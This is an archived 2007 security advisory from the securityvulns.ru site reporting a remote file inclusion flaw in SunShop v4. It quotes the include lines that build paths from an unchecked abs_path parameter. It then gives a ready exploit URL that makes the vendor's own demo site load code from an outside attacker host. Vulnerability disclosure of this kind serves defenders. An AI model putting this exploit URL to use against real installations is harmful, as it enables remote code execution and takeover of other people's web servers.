Computer Security

Security Advisory: sunshop v4 >> RFI
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Burak Yılmaz Blog (tr) v1.0 SQL injection vulnerability

  SineCMS

  modbuild  >>    4.1     Remote File Inclusion

  :doruk100net >> RFI

From:alijsb_(at)_yahoo.com <alijsb_(at)_yahoo.com>
Date:28.04.2007
Subject:sunshop v4 >> RFI

vendor : turnkeywebtools.com
by : s3rv3r_hack3r ( alijsb@yahoo.com )
bugz:
++++++++++++++++++++
include/payment/payflow_pro.php >
include $abs_path."/include/payment/payflow_pro/pfpro.class.php";
++++++++++++++++++++
global.php
require_once $abs_path."/libsecure.php";
++++++++++++++++++++
libsecure.php
include $abs_path . '/admin/config.php';
++++++++++++++++++++
EXploit : file.php?abs_path=http://shell
for example :
http://demos.turnkeywebtools.com/ss4/include/payment/payflow_pro.php?abs_path=htt
p://www.hackerz.ir/?
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru